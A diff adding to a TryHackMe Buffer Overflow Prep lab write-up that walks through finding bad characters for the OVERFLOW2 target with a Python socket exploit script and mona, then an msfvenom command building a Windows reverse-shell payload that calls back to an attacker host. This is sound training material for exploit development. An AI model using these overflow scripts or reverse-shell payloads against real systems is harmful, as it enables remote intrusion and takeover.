--- a/TryHackMe/Buffer_Overflow_Prep/2.md
+++ b/TryHackMe/Buffer_Overflow_Prep/2.md
@@ -137,3 +137,116 @@ for x in range(1, 256):
 
 print()   
 ```
+
+I then take the output of the above script and use it for my payload variable.
+*Note, I had restarted the machine so the ip address of the target will be different in these scripts.*
+
+find_bad_chars.py
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.249.184"
+port = 1337
+
+prefix = "OVERFLOW2 "
+offset = 634
+overflow = "A" * offset
+retn = "BBBB"
+padding = ""
+payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+
+```
+
+In Immunity I use mona to create a matching byte array exluding \x00 as a bad char, I take note of the binary path
+
+`!mona bytearray -b "\x00"`
+
+![image](https://user-images.githubusercontent.com/83407557/185273994-3234c794-fb1d-4776-8ed7-28b94702773e.png)
+
+
+I restart the application using ctrlF2 and F9 and run find_bad_chars.py
+
+Before running `!mona compare -f C:\mona\oscp\bytearray.bin -a <address>` I check on the address of ESP
+
+![image](https://user-images.githubusercontent.com/83407557/185274900-aa7175d1-63e9-498f-afb4-a23def7a8283.png)
+
+`!mona compare -f C:\mona\oscp\bytearray.bin -a 019DFA30`
+
+![image](https://user-images.githubusercontent.com/83407557/185275666-f37ef44a-166e-4892-9a16-82708ed5a704.png)
+
+I then update my python code's byte array, by removing \x23 \x3c \x83 \xba
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.249.184"
+port = 1337
+
+prefix = "OVERFLOW2 "
+offset = 634
+overflow = "A" * offset
+retn = "BBBB"
+padding = ""
+payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+
+```
+
+and update the mona byte array in the same fashion
+
+`!mona bytearray -b "\x00\x23\x3c\x83\xba"`
+
+![image](https://user-images.githubusercontent.com/83407557/185276301-ac0434a1-8fcf-4e58-ab25-c5532cc23130.png)
+
+I then restart the application and rerun find_bad_chars.py, taking note of the new ESP address when the application crashed.
+
+![image](https://user-images.githubusercontent.com/83407557/185276512-589da28e-aac9-476b-97aa-dd99e107ed60.png)
+
+I can then us this new ESP address of 01ADFA30 to do another mona compare
+
+`!mona compare -f C:\mona\oscp\bytearray.bin -a 01ADFA30`
+
+![image](https://user-images.githubusercontent.com/83407557/185276811-cbf0fbe2-1d1e-47cb-8810-4fde8022ce87.png)
+
+This time, having found no more bad characters, I can now build the actual shellcode.
+
+# Creating shellcode with msfvenom
+
+`msfvenom -p windows/shell_reverse_tcp LHOST=10.6.77.38 LPORT=4444 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c`
+
+I also note that the payload size is 353 byes
+
+![image](https://user-images.githubusercontent.com/83407557/185277920-cea3b634-03f7-40c8-8167-274cbd2bf43b.png)
+
+whereas our initial payload size shows a space of 332 bytes:
+
+![image](https://user-images.githubusercontent.com/83407557/185278129-6032d5bd-db98-441e-a15d-27e0201c873a.png)
+
